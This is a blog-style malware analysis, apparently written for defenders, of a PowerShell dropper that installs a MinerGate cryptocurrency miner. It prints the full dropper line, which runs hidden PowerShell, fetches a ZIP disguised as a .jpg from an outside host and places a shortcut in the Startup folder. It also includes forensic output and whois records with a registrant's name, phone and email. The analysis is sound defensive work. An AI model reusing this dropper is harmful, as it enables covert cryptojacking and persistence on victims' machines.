Rise of the Crypto Miner Malware
We’ve been sitting on this for some time. But as we were tiding our notes we stumbled across this draft post we never really finished. Sadly, there is not too much to tell. But hopefully this will help other blueteamers, in understanding crypto-mining malware infections?
A copy of the powershell malware can be found on pastebin here:
https://pastebin.com/pxKXKKAY
The investigation started as a bit of powershell:
new ActiveXObject(“WScript.Shell”).Run(“powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command “+String.fromCharCode(34)+”$str0 =”http://gul";$str1 = ‘Miner’ ;$TempDir = [System.IO.Path]::GetTempPath();$startup = [environment]::getfolderpath(‘Startup’);$url1 = ($str0)+’fup.co/i/00676/e2zlk0e4qr4c.jpg’;$output1 = ($TempDir+$str1);$wc = New-Object System.Net.WebClient;$wc.DownloadFile($url1, $output1);Start-Sleep -s 30;$proj_files = Get-Item -Path ($TempDir+$str1);ForEach ($file in $proj_files) {;$filenew1 = $str1 + ‘.zip’;Rename-Item $file $filenew1};Expand-Archive -Path ($TempDir+$filenew1) -DestinationPath ($TempDir) -Force;Start-Sleep -s 20;$str3 = ‘update.lnk’;Copy-Item ($TempDir+$str3) -Destination $startup ;Start-Sleep -s 10;Invoke-Item ($startup+$str3)”+String.fromCharCode(34),0,false);
minergate-cli -user djamel4art@gmail.com -bcn 1
The payload: http://gulfup.co/i/00676/e2zlk0e4qr4c.jpg
Hexdump of the payload:
$ xxd e2zlk0e4qr4c.jpg
0000000: 504b 0304 1400 0000 0800 665d 3945 22ec PK……..f]9E”.
0000010: 0e6f 40ed 5000 00f0 7a00 1100 0000 6d69 .o@.P…z…..mi
0000020: 6e65 7267 6174 652d 636c 692e 6578 65d4 nergate-cli.exe.
0000030: 3a0b 7414 5596 af3a 954e 8514 e942 ba23 :.t.U..:.N…B.#
0000040: 08ab 7104 7526 0c2e 4405 a7fd 2439 d36d ..q.u&..D…$9.m
0000050: 401b 3ab4 743b cb49 0203 3a31 e320 86ae @.:.t;.I..:1. ..
Looks like a ZIP file containing a bitcoin miner! Because the file’s magic bytes are 0x504b = PK.
We can use binwalk to extract parts of the binary:
$ binwalk e2zlk0e4qr4c.jpg
DECIMAL HEX DESCRIPTION
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
0 0x0 Zip archive data, at least v2.0 to extract
5303663 0x50ED6F Zip archive data, at least v2.0 to extract
5461951 0x5357BF Zip archive data, at least v2.0 to extract
5935809 0x5A92C1 Zip archive data, at least v2.0 to extract
7763954 0x7677F2 COBALT boot rom data (Flat boot rom or file system)
8031674 0x7A8DBA Zip archive data, at least v2.0 to extract
...abbreviated...
List of extracted files:
$ ls
0.zip 806577.zip 8A5FFA.zip e2zlk0e4qr4c.jpg rn.js
50ED6F.zip 8065D3.zip 8BD983.zip libeay32.dll ssleay32.dll
5357BF.zip 8265F6.zip Qt5Core.dll minergate-cli.exe update.lnk
5A92C1.zip 8268D8.zip Qt5Network.dll msvcp110.dll vccorlib110.dll
7A8DBA.zip 83D42C.zip Qt5WebSockets.dll msvcr110.dll
7FC82D.zip 83D454.zip cudart32_60.dll platforms
Standard strings against the windows shortcut (update.lnk)
$ strings update.lnk
/C:\
Users
kamel
AppData
Local
Temp
Ka=.
1SPS
rn.js
C:\Users\kamel\AppData\Local\Temp\rn.js
desktop-4tlqnc3
%temp%\rn.js
Minergate
The command
minergate-cli -user djamel4art@gmail.com -bcn 1
Minergate-client comand breakdown
minergate-cli -user <account/email> -<coin type> <cores>
Therefore:
- account = djamel4art@gmail.com
- coin = Bytecoin
- cores = 1 A list of currency /coin types are:
- bcn Bytecoin
- xmr Monero
- fcn Fantomcoin
- dsh Dashcoin
- qcn QuazarCoin
- xdn DigitalNote
- mcn MonetaVerde
- aeon Aeon coin
- inf8 Infinium-8
Whois
$ whois gulfup.co Domain Name: gulfup.co Registry Domain ID: D177495327-CO Registrar WHOIS Server: Registrar URL: whois.godaddy.com Updated Date: 2017–03–11T11:29:25Z Creation Date: 2017–03–11T11:12:08Z Registry Expiry Date: 2018–03–10T23:59:59Z Registrar: GoDaddy.com, Inc. Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Registry Registrant ID: C177495323-CO Registrant Name: Abdulaali Alzahrani Registrant Organization: Registrant Street: albaha Registrant Street: albaha Registrant Street: Registrant City: albaha Registrant State/Province: king abdulaziz Registrant Postal Code: 61008 Registrant Country: SA Registrant Phone: +966.564401880 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: zx_xs@hotmail.com Registry Admin ID: C177495325-CO Tech Name: Abdulaali Alzahrani Tech Organization: Tech Street: albaha Tech Street: albaha Tech Street: Tech City: albaha Tech State/Province: king abdulaziz Tech Postal Code: 61008 Tech Country: SA Tech Phone: +966.564401880 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: zx_xs@hotmail.com Name Server: aragorn.ns.cloudflare.com Name Server: melissa.ns.cloudflare.com
whois on the hosting IP range:
$ whois 62.210.139.211 inetnum: 62.210.128.0–62.210.255.255 org: ORG-ONLI1-RIPE netname: IE-POOL-BUSINESS-HOSTING descr: IP Pool for Iliad-Entreprises Business Hosting Customers country: FR admin-c: IENT-RIPE tech-c: IENT-RIPE status: LIR-PARTITIONED PA mnt-by: MNT-TISCALIFR-B2B created: 2012–11–02T11:40:24Z last-modified: 2016–02–22T16:26:23Z source: RIPE mnt-routes: MNT-TISCALIFR-B2B mnt-lower: MNT-TISCALIFR-B2B For more information about Minergate visit: https://minergate.com/
Conclusion
Fake whois record for the domain, the created update.lnk file leaked a user name ‘kamal’, the minergate account was for a gmail account ‘djamel4art’. As this point we could not progress any further.
Share on: